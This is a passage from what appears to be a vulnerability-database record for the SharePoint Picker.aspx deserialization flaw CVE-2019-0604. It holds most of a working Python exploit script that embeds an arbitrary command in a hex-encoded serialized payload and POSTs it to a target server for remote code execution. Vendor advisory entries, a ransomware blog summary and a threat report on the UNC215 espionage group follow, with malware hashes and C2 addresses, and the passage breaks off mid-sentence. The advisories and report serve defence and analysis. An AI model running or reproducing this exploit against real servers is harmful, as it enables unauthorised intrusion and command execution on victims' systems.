len(cmd)\n s = \"\"\n for i in range(0,length,4):\n character = cmd[i]+cmd[i+1]+cmd[i+2]+cmd[i+3]\n character = character[::-1]\n c_hex = codecs.decode(character,\"hex\")\n a = codecs.decode(c_hex,\"utf-16be\")\n s += a\n\t\t\n return s\n\n####################################### \nsignal.signal(signal.SIGINT, signal.default_int_handler)\nargs = Args()\n\nmyargs = dict(args.grouped)\nif '--help' in myargs or '-h' in myargs:\n help = \"\"\"\n desharialize options:\n -h --help - This menu\n -u --url - The Sharepoint Picker.aspx URL ( e.g. http://localhost/_layouts/15/Picker.aspx )\n -c --command - The command to run on the target Sharepoint server.\n -f --file - The file containing the command to run (Useful for commands with multi-lines or characters that need escaping)\n \"\"\"\n print (help)\n exit(0)\n \nurl = ''\ncmd = ''\nfilename = ''\nif '--url' in myargs or '-u' in myargs:\n try:\n url = myargs['--url'][0]\n except:\n url = myargs['-u'][0]\n \nif '--command' in myargs or '-c' in myargs:\n if '--file' in myargs or '-f' in myargs:\n print(\"Can't use both command and file options at the same time!\")\n exit(0)\n try:\n cmd = myargs['--command'][0]\n except:\n cmd = myargs['-c'][0]\n\nif '--file' in myargs or '-f' in myargs:\n try:\n filename = myargs['--file'][0]\n except:\n filename = myargs['-f'][0]\n file = open(filename,mode='r')\n cmd = file.read()\n file.close()\n \n\nsharepoint2019and2016 = \"?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=16.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c\";\nsharepoint2013 = \"?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c\";\nsharepoint2010 = \"?PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=14.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c\";\n \nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\nif PY3:\n string_types = str,\n raw_input = input\nelse:\n string_types = basestring,\n\nif url == '':\n url = raw_input(\"Enter the SharePoint Server URL ending with Picker.aspx:\")\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',\n}\n\nfirstcall = requests.get(url,headers=headers)\nspheader = firstcall.headers.get('MicrosoftSharePointTeamServices','16')\n\nspheader = int(spheader.split('.')[0])\n\npayload = \"__bpzzzz35009700370047005600d600e2004400160047001600e20035005600270067009600360056003700e2009400e600470056002700e6001600c600e2005400870007001600e600460056004600750027001600070007005600270006002300b500b50035009700370047005600d600e20075009600e6004600f60077003700e200d40016002700b60057000700e20085001600d600c600250056001600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500c200b50035009700370047005600d600e20075009600e6004600f60077003700e2004400160047001600e200f4002600a600560036004700440016004700160005002700f60067009600460056002700c200020005002700560037005600e6004700160047009600f600e600640027001600d60056007700f6002700b600c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3003300130026006600330083005300630016004600330063004300560033005300d500d500c200020035009700370047005600d600e2004400160047001600e20035005600270067009600360056003700c200020065005600270037009600f600e600d3004300e2000300e2000300e2000300c200020034005700c6004700570027005600d300e60056005700470027001600c600c2000200050057002600c60096003600b400560097004500f600b6005600e600d3002600730073001600530036005300630013009300330043005600030083009300a300c300f3008700d600c600020067005600270037009600f600e600d30022001300e2000300220002005600e6003600f60046009600e6007600d3002200570047006600d200130063002200f300e300d000a000c3005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700d600c600e6003700a300870037009600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d6001600d2009600e600370047001600e60036005600220002008700d600c600e6003700a300870037004600d30022008600470047000700a300f200f200770077007700e20077003300e200f60027007600f2002300030003001300f2008500d400c4003500360086005600d60016002200e300d000a00002000200c30005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a0000200020002000200c300f4002600a6005600360047009400e600370047001600e600360056000200870037009600a3004700970007005600d300220085001600d600c60025005600160046005600270022000200f200e300d000a0000200020002000200c300d400560047008600f6004600e4001600d6005600e30005001600270037005600c300f200d400560047008600f6004600e4001600d6005600e300d000a0000200020002000200c300d400560047008600f60046000500160027001600d60056004700560027003700e300d000a000020002000200020002000200c3001600e600970045009700070056000200870037009600a3004700970007005600d3002200870037004600a3003700470027009600e60076002200e3006200c6004700b300250056003700f600570027003600560044009600360047009600f600e60016002700970002008700d600c600e6003700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600f20007002700560037005600e6004700160047009600f600e600720002008700d600c600e6003700a3008700d30072008600470047000700a300f200f2003700360086005600d60016003700e200d600960036002700f6003700f60066004700e2003600f600d600f20077009600e60066008700f2002300030003006300f20087001600d600c600720002008700d600c600e6003700a30035009700370047005600d600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600b3001600370037005600d6002600c6009700d300d60037003600f6002700c60096002600720002008700d600c600e6003700a3004400960016007600d30072003600c6002700d200e6001600d600560037000700160036005600a30035009700370047005600d600e2004400960016007600e600f60037004700960036003700b3001600370037005600d6002600c6009700d30037009700370047005600d6007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f6006700960046005600270002008700a300b40056009700d3007200970072000200f4002600a6005600360047004500970007005600d3007200b7008700a300450097000700560002004400960016007600a30005002700f6003600560037003700d70072000200d400560047008600f6004600e4001600d6005600d3007200350047001600270047007200620076004700b3006200c6004700b300f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b3003600d60046006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b30035009700370047005600d600a3003500470027009600e6007600620076004700b300f20036000200e200e200e200140024003400e200e200e20002006200c6004700b300f20035009700370047005600d600a3003500470027009600e6007600620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700e200d400560047008600f60046000500160027001600d60056004700560027003700620076004700b3006200c6004700b300f200f4002600a600560036004700440016004700160005002700f60067009600460056002700620076004700b3006200c6004700b300f200250056003700f600570027003600560044009600360047009600f600e600160027009700620076004700b3000200c300f2001600e60097004500970007005600e300d000a0000200020002000200c300f200d400560047008600f60046000500160027001600d60056004700560027003700e300d000a00002000200c300f20005002700f600a6005600360047005600460005002700f600070056002700470097000300e300d000a000c300f2005400870007001600e6004600560046007500270016000700070056002700f400660085001600d600c600250056001600460056002700f4002600a600560036004700440016004700160005002700f60067009600460056002700e300\"\n\nassemblyvalue = sharepoint2019and2016\n\nif spheader == 15:\n assemblyvalue = sharepoint2013\nelif spheader == 14:\n assemblyvalue = sharepoint2010\nelse:\n assemblyvalue = sharepoint2019and2016\n\nFullURL = url + assemblyvalue\n\nsecondcall = requests.get(FullURL,headers=headers)\nsecondcalltext = secondcall.text\n\ntree = html.fromstring(secondcall.content)\nviewstate = ''\neventvalidation = ''\ntry:\n viewstate = tree.get_element_by_id('__VIEWSTATE')\n viewstate = viewstate.value\nexcept:\n pass\n\ntry:\n eventvalidation = tree.get_element_by_id('__EVENTVALIDATION')\n eventvalidation = eventvalidation.value\nexcept:\n pass\n\n\nif cmd == '':\n cmd = raw_input(\"Write your full command here to execute on the test target system (Make sure you have permissions from system owner):\")\n\n\n#escapedcmd = escape(cmd,html_escape_table)\ncmd = cmd.replace(\"&\",\"&\")\ncmd = cmd.replace(\">\",\">\")\ncmd = cmd.replace(\"<\",\"<\")\ncmd = cmd.replace(\"\\\"\",\"\"\")\ncmd = cmd.replace(\"'\",\"&apos;\")\nescapedcmd = escape(cmd)\n\n\n\n\nprint(escapedcmd)\nsrlcmd = serialize_command(escapedcmd)\n\nlength = 1448 + len(escapedcmd)\nhex_length = format(length * 4,'x')\nserialized_length = hex_length[::-1]\n\npayload = payload.replace(\"e200e200e200140024003400e200e200e200\",srlcmd)\npayload = payload.replace(\"zzzz\",serialized_length)\n\nprint(\"Deserialized Payload:\")\nprint(deserialize_command(payload[8:]))\ndata = {\"__VIEWSTATE\":viewstate,\"__EVENTVALIDATION\":eventvalidation,\"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData\":payload}\nthirdcall = requests.post(FullURL, data=data,headers=headers)\n\nprint(\"Payload launched! Check execution results. Exiting...\")\n", "sourceHref": "https://0day.today/exploit/33951", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2023-12-07T16:55:07", "description": "Added: 03/03/2020 \nCVE: [CVE-2019-0604](<https://vulners.com/cve/CVE-2019-0604>) \nBID: [106914](<http://www.securityfocus.com/bid/106914>) \n\n\n### Background\n\n[Microsoft SharePoint](<https://products.office.com/en-us/sharepoint/collaboration>) is a tool for management and automation of business processes, as well as a platform for social networking. \n\n### Problem\n\nA deserialization vulnerability in Microsoft SharePoint allows remote attackers to execute arbitrary commands by sending a specially crafted request to the `**Picker.aspx**` resource. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft advisory [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n\n### References\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604> \n\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-03T00:00:00", "type": "saint", "title": "Microsoft SharePoint Picker.aspx deserialization vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2020-03-03T00:00:00", "id": "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/sharepoint_picker_deserial", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-21T16:50:46", "description": "Added: 03/03/2020 \nCVE: [CVE-2019-0604](<https://vulners.com/cve/CVE-2019-0604>) \nBID: [106914](<http://www.securityfocus.com/bid/106914>) \n\n\n### Background\n\n[Microsoft SharePoint](<https://products.office.com/en-us/sharepoint/collaboration>) is a tool for management and automation of business processes, as well as a platform for social networking. \n\n### Problem\n\nA deserialization vulnerability in Microsoft SharePoint allows remote attackers to execute arbitrary commands by sending a specially crafted request to the `**Picker.aspx**` resource. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft advisory [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n\n### References\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604> \n\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-03T00:00:00", "type": "saint", "title": "Microsoft SharePoint Picker.aspx deserialization vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2020-03-03T00:00:00", "id": "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/sharepoint_picker_deserial", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 03/03/2020 \nCVE: [CVE-2019-0604](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0604>) \nBID: [106914](<http://www.securityfocus.com/bid/106914>) \n\n\n### Background\n\n[Microsoft SharePoint](<https://products.office.com/en-us/sharepoint/collaboration>) is a tool for management and automation of business processes, as well as a platform for social networking. \n\n### Problem\n\nA deserialization vulnerability in Microsoft SharePoint allows remote attackers to execute arbitrary commands by sending a specially crafted request to the `**Picker.aspx**` resource. \n\n### Resolution\n\nApply the appropriate update referenced in Microsoft advisory [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n\n### References\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604> \n\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-03T00:00:00", "type": "saint", "title": "Microsoft SharePoint Picker.aspx deserialization vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2020-03-03T00:00:00", "id": "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/sharepoint_picker_deserial", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2021-07-28T14:33:23", "description": "We discuss the technical features of a Hello ransomware attack, including its exploitation of CVE-2019-0604 and the use of a modified version of the China Chopper web shell.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-27T00:00:00", "type": "trendmicroblog", "title": "Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2021-04-27T00:00:00", "id": "TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2", "href": "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-08-12T17:20:58", "description": "This blog post details the post-compromise tradecraft and operational tactics, techniques, and procedures (TTPs) of a Chinese espionage group we track as UNC215. While UNC215\u2019s targets are located throughout the Middle East, Europe, Asia, and North America, this report focuses on intrusion activity primarily observed at Israeli entities.\n\nThis report comes on the heels of the July 19, 2021, [announcements](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/19/the-united-states-joined-by-allies-and-partners-attributes-malicious-cyber-activity-and-irresponsible-state-behavior-to-the-peoples-republic-of-china/>) by governments in North America, Europe, and Asia and intragovernmental organizations, such as the North Atlantic Treaty Organization (NATO), and the European Union, condemning widespread cyber espionage conducted on behalf of the Chinese Government. These coordinated statements attributing sustained cyber espionage activities to the Chinese Government corroborate our long-standing reporting on Chinese threat actor targeting of private companies, governments, and various organizations around the world, and this blog post shows yet another region where Chinese cyber espionage is active.\n\n#### Threat Detail\n\nIn early 2019, Mandiant began identifying and responding to intrusions in the Middle East by Chinese espionage group UNC215. These intrusions exploited the Microsoft SharePoint vulnerability CVE-2019-0604 to install web shells and FOCUSFJORD payloads at targets in the Middle East and Central Asia. There are targeting and high level technique overlaps with between UNC215 and APT27, but we do not have sufficient evidence to say that the same actor is responsible for both sets of activity. APT27 has not been seen since 2015, and UNC215 is targeting many of the regions that APT27 previously focused on; however, we have not seen direct connection or shared tools, so we are only able to assess this link with low confidence.\n\nIn addition to data from Mandiant Incident Response and FireEye telemetry, we worked with Israeli defense agencies to review data from additional compromises of Israeli entities. This analysis showed multiple, concurrent operations against Israeli government institutions, IT providers and telecommunications entities beginning in January 2019. During this time, UNC215 used new TTPs to hinder attribution and detection, maintain operational security, employ false flags, and leverage trusted relationships for lateral movement. We believe this adversary is still active in the region.\n\n#### Attack Lifecycle\n\nBetween 2019 and 2020, Mandiant responded to several incidents where Microsoft SharePoint vulnerability CVE-2019-0604 was used to deliver web shells, and then FOCUSFJORD payloads to select government and academic targets in the Middle East and Central Asia.\n\nAfter gaining initial access, the operators conduct credential harvesting and extensive internal network reconnaissance. This includes running native Windows commands on compromised servers, executing ADFind on the Active Directory, and scanning the internal network with numerous publicly available tools and a non-public scanner we named WHEATSCAN. The operators made a consistent effort to delete these tools and remove any residual forensic artifacts from compromised systems.\n\nIn another incident response investigation, UNC215 pivoted to multiple OWA servers and installed web shells. In the following days, the operators interacted with these web shells from internal IP addresses, attempting to harvest credentials.\n\nAfter identifying key systems within the target network, such as domain controllers and Exchange servers, UNC215 moved laterally and deployed their signature malware FOCUSFJORD. UNC215 often uses FOCUSFJORD for the initial stages of an intrusion, and then later deploys HYPERBRO, which has more information collection capabilities such as screen capture and keylogging. While UNC215 heavily relies on the custom tools FOCUSFJORD and HYPERBRO, Chinese espionage groups often have resource sharing relationships with other groups, and we do not have enough information to determine if these tools are developed and used exclusively by UNC215.\n\n \nFigure 1: Attack Lifecycle\n\n#### Tradecraft and Operational Security\n\nWe identified numerous examples of efforts by UNC215 to foil network defenders by minimizing forensic evidence left on compromised hosts, exploiting relationships with trusted third parties, continuously improving the FOCUSFJORD backdoor, concealing command and control (C2) infrastructure, and incorporating false flags.\n\n_Reducing Forensic Evidence on Disk_\n\nUNC215 consistently cleaned up evidence of their intrusion after gaining access to a system. This type of action can make it more difficult for incident responders to reconstruct what happened during a compromise.\n\n * The operators deleted tools used for credential harvesting and internal reconnaissance including a custom scanner dubbed WHEATSCAN after use.\n * The first FOCUSFJORD payload delivered to a system contains a blob that includes C2 and other configuration data. On initial execution, FOCUSFJORD writes its encrypted C2 configuration into the system\u2019s registry, sets up a persistence mechanism and then rewrites itself on disk without the embedded configuration and with limited functionality to only read configuration data. This process enables the operators to obfuscate the configured C2 servers from automated sandbox runs or disclosure in public file scanning services.\n * A newly identified utility dubbed FJORDOHELPER can update FOCUSFJORD configurations and completely remove FOCUSFJORD from the system. The tool can be deployed and executed remotely to delete any remaining FOCUSFJORD forensic evidence, including files on disk, configuration data encrypted in the registry, and related services and registry keys used for persistence.\n\n_Exploiting Trust Relationships_\n\nUNC215 leveraged trusted third parties in a 2019 operation targeting an Israeli government network. As illustrated in Figure 2, the operators were able to access their primary target via RDP connections from a trusted third party using stolen credentials and used this access to deploy and remotely execute FOCUSFJORD on their primary target.\n\n \nFigure 2: Two FOCUSFJORD samples configured to proxy C2 traffic\n\n_Concealing C2 Infrastructure_\n\nUNC215 made technical modifications to their tools to limit outbound network traffic and used other victim networks to proxy their C2 instructions, likely to minimize the risk of detection and blend in with normal network traffic. The following are examples of HYPERBRO and FOCUSFJORD samples capable of acting as proxies to relay communications to their C2 servers. We do not have enough context about the following samples to attribute all of them to UNC215, though they are representative of activity we have seen from the group.\n\n * HYPERBRO samples MD5: 0ec4d0a477ba21bda9a96d8f360a6848 and MD5: 04dece2662f648f619d9c0377a7ba7c0 have embedded configurations of internal IP addresses (192.168.1.237 and 192.168.4.26 respectively) as C2 servers. If they receive a command with an IP address and port, they will connect and relay the command.\n * FOCUSFJORD sample MD5: e3e1b386cdc5f4bb2ba419eb69b1b921 has an internal IP address, 192.168.4.197, configured as its C2. This sample was extracted from MD5: c25e8e4a2d5314ea55afd09845b3e886, which was submitted to a public malware repository in December 2017.\n\nWhile hunting for FOCUSFJORD samples, we found a sample of a new malware (MD5: 625dd9048e3289f19670896cf5bca7d8) that shares code with FOCUSFJORD, but is distinct. However, analysis indicates that it only contains functions to relay communications between another FOCUSFJORD instance and a C2 server (Figure 2, Network A). We suspect this type of malware was used in the aforementioned operation. The actors stripped out unnecessary FOCUSFJORD capabilities, possibly to reduce the likelihood it would be detected by security controls. Figure 3 contains the data structure as it is being sent from a FOCUSFJORD sample configured to communicate with another FOCUSFJORD victim.\n\n \nFigure 3: Two FOCUSFJORD samples configured to proxy C2 traffic\n\n_FOCUSFJORD Changes_\n\nWe have observed numerous variants of the FOCUSFJORD malware family since 2017. The authors have added new communications protocols, an updated loading mechanism, and expanded the number of supported configurations in newer versions. Version numbers indicate that the malware undergoes frequent changes and maybe supported by a team of developers. Many of these variants contain or remove functionality depending on the operator\u2019s unique requirements at the time, which may suggest that multiple operators have access to the source code or a builder, or that a close relationship exists between the developers and operators. \n\nFOCUSFJORD samples can be configured with up to 13 unique registry values which allow operators to control and organize compromised hosts. In addition to specifying details related to the loading and persistence mechanisms and C2 communications, there are two keys which allow the operator to add additional context about the victim: \n\n * Registry key 12 is the \u201cgroup\u201d name. When a new FOCUSFJORD sample is first executed and writes its configuration to registry, this value is set to \u201cdefault\u201d and is later manually changed by the actor, usually to the victim\u2019s domain name or organization name.\n * Registry key 13 could be interpreted as the \u201cconsole\u201d name, although we do not fully understand how the identifier is used by the operators. We have observed the values \u201cgalway\u201d, \u201ciceland\u201d, \u201chelen\u201d, and \u201cidapro\u201d.\n\nIt is not clear how or if UNC215 uses these configuration parameters to organize and track large numbers of compromised hosts. We observed different console values within the same network, identical console values using different C2 addresses, and identical console values targeting different countries. Some FOCUSFJORD samples from 2018 and 2020 use the same console values despite the significant gap in time (See Table 1).\n\n * The NCC Group discussed these configurations in a 2018 [report](<https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/>) and released a decoding [tool](<https://github.com/nccgroup/Cyber-Defence/tree/master/Scripts/emissary_panda_registry>).\n * Trendmicro noted changes to supported configurations in FOCUSFJORD, dubbed SysUpdate, in their [2020](<https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf>) and [2021](<https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html>) reports following public disclosures. This suggests that operators using FOCUSFJORD are sensitive to security vendor reports and will update the code to avoid detection and exposure.\n\n**Registry Key 13**\n\n| \n\n**FOCUSFJORD MD5 Hash**\n\n| \n\n**Related C2**\n\n| \n\n**Suspected Target** \n \n---|---|---|--- \n \nhelen\n\n| \n\n3d95e1c94bd528909308b198f3d47620\n\n| \n\n139.59.81.253\n\n| \n\nIsrael \n \nhelen\n\n| \n\nf335b241652cb7f7e736202f14eb48e9\n\n| \n\n139.59.81.253\n\n| \n\nIsrael \n \nhelen\n\n| \n\na0b2193362152053671dbe5033771758\n\n| \n\n139.59.81.253\n\n| \n\nIsrael \n \nhelen\n\n| \n\n6a9a4da3f7b2075984f79f67e4eb2f28\n\n| \n\n139.59.81.253\n\n| \n\nKazakhstan \n \nhelen\n\n| \n\na19370b97fe64ca6a0c202524af35a30\n\n| \n\n159.89.168.83\n\n| \n\nIran \n \nhelen\n\n| \n\n3c1981991cce3b329902288bb2354728\n\n| \n\n103.59.144.183\n\n| \n\nUnknown \n \niceland\n\n| \n\n26d079e3afb08af0ac4c6d92fd221e71\n\n| \n\n178.79.177.69\n\n| \n\nUAE \n \niceland\n\n| \n\n19c46d01685c463f21ef200e81cb1cf1\n\n| \n\n138.68.154.133\n\n| \n\nUAE \n \niceland\n\n| \n\n28ce8dbdd2b7dfd123cebbfff263882c\n\n| \n\n138.68.154.133\n\n| \n\nUnknown \n \niceland\n\n| \n\na78c53351e23d3f84267e67bbca6cf07 \n\n| \n\n206.189.123.156\n\n| \n\nIsrael (Gov), UAE \n \niceland\n\n| \n\na78c53351e23d3f84267e67bbca6cf07 \n\n| \n\n206.189.123.156\n\n| \n\nIsrael (IT) \n \nidapro\n\n| \n\na78c53351e23d3f84267e67bbca6cf07 \n\n| \n\n206.189.123.156\n\n| \n\nIsrael (IT) \n \ngalway\n\n| \n\n04c51909fc65304d907b7cb6c92572cd\n\n| \n\n159.65.80.157\n\n| \n\nUnknown \n \ngalway\n\n| \n\n0e061265c0b5998088443628c03188f0\n\n| \n\n159.65.80.157\n\n| \n\nUnknown \n \ngalway\n\n| \n\n09ffc31a432f646ebcec59d32f286317\n\n| \n\n159.65.80.157\n\n| \n\nUnknown \n \ngalway\n\n| \n\n6ca8993b341bd90a730faef1fb73958b\n\n| \n\n128.199.44.86\n\n| \n\nUnknown \n \nHelen *\n\n| \n\nUnknown\n\n| \n\n46.101.255.16\n\n| \n\nIran \n \nHelen *\n\n| \n\nUnknown\n\n| \n\n178.79.143.78\n\n| \n\nIran \n \nIdapro *\n\n| \n\nUnknown\n\n| \n\n138.68.154.133\n\n| \n\nIran \n \nTable 1: FOCUSFJORD comparison (note: the * entries are from public [reporting](<https://www.kamiran.asia/documents/APT27_HackerTeam_Analyse.pdf>) and have not been verified by Mandiant)\n\n_False Flags_\n\nArtifacts in UNC215 campaigns often contain foreign language strings that do not match the country being targeted and may be intended to mislead an analyst examining the malware. Additionally, on at least three occasions, UNC215 employed a custom tool associated with Iranian actors whose source code was leaked.\n\n * In several cases, we identified FOCUSFJORD samples with registry key names in regional languages. The registry key names are hardcoded into every FOCUSFJORD sample, as the malware needs to read and decrypt those registry key values for proper execution.\n * FOCUSFJORD samples (MD5: d13311df4e48a47706b4352995d67ab0 and MD5: 26d079e3afb08af0ac4c6d92fd221e71) observed on Israeli and UAE networks, and a memory dump (MD5: d875858dbd84b420a2027ef5d6e3a512) submitted to a public malware repository by a likely Uzbekistan financial organization are configured with registry keys in Farsi. Linguistic analysis suggests that these terms were auto translated as they are not commonly used by native Farsi speakers.\n * Another FOCUSFJORD sample uploaded from Uzbekistan (MD5: ac431261b8852286d99673fddba38a50) contains a configuration with registry key names in Hindi. Notably, this variant also contains an error message string in Arabic ('\u0636\u0627\u0626\u0639' \u2013 which translates to: lost or missing).\n * In April 2019, UNC215 deployed the SEASHARPEE web shell against financial and high-tech organizations in the Middle East and Asia. The SEASHARPEE web shell was developed and used by Iranian APT actors until the code was leaked online in the telegram channel Lab Dookhtegan a few weeks earlier in March 2019.\n * Around this time, the Turkish-language file Sosyal G\u00fcvenlik Reformu-Not-3.doc \"Social Security Reform - Note - 3.doc\" (MD5: 6930bd66a11e30dee1ef4f57287b1318) was distributed to a suspected Turkish government entity based on data from an open-source malware repository. The document contains \"C:\\Users\\Iran\" paths that were likely included to obfuscate the source of the activity.\n\nThe use of Farsi strings, filepaths containing /Iran/, and web shells publicly associated 